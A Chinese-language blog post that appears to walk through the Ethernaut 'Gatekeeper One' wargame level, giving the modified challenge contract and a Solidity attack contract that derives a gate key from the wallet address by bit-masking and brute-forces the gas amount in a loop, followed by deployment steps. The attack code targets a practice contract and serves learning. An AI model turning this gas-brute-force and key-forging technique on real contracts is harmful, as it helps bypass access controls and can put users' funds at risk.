# 测试13

**Published by:** [hujiawei](https://paragraph.com/@hujiawei/)
**Published on:** 2022-04-18
**URL:** https://paragraph.com/@hujiawei/13

## Content

1.将官方提供的源代码做些许改动，并创建名为Eth13.sol文件。改动后的代码如下：// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/math/SafeMath.sol'; contract GatekeeperOne { using SafeMath for uint256; address public entrant; uint256 i = uint256(uint160(address(tx.origin))); modifier gateOne() { require(msg.sender != tx.origin); _; } modifier gateTwo() { require(gasleft().mod(8191) == 0); _; } modifier gateThree(bytes8 _gateKey) { require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)), "GatekeeperOne: invalid gateThree part one"); require(uint32(uint64(_gateKey)) != uint64(_gateKey), "GatekeeperOne: invalid gateThree part two"); require(uint32(uint64(_gateKey)) == uint16(i), "GatekeeperOne: invalid gateThree part three"); _; } function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) { entrant = tx.origin; return true; 或者使用以下链接：https://github.com/ssadad112/eth13_1.sol/blob/main/eth1313.sol2.部署新合约，命名为Eth13_attack.sol 。合约代码如下：// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import 'https://github.com/ssadad112/eth13_1.sol/blob/main/eth1313.sol'; contract AreYouTheKeymaster{ using SafeMath for uint256; bytes8 txOrigin16 = 0xA4c02754963E3a2e; //你钱包地址的后16位 bytes8 key = txOrigin16 & 0xFFFFFFFF0000FFFF; GatekeeperOne public gkpOne; function setGatekepperOne(address _addr) public{ gkpOne = GatekeeperOne(_addr); } function letMeIn() public{ for (uint256 i =0; i < 120; i++) { (bool result, bytes memory data) = address(gkpOne).call{gas: i + 150 + 8191*3}(abi.encodeWithSignature("enter(bytes8)", key)); if(result) { break; } } }}或者使用以下链接：https://github.com/ssadad112/Eth13_attack.sol/blob/main/Eth13_attack.sol 3.部署这个合约，见下图：4.部署成功后在浏览器提供的实例地址填入上图中的“setGatekepp”处，然后点击“setGatekepp”，确认钱包。确认后点击 “letmein”，确认钱包，任务结束，提交。

## Publication Information

- [hujiawei](https://paragraph.com/@hujiawei/): Publication homepage
- [All Posts](https://paragraph.com/@hujiawei/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@hujiawei): Subscribe to updates
- [Twitter](https://twitter.com/hujiawei1988): Follow on Twitter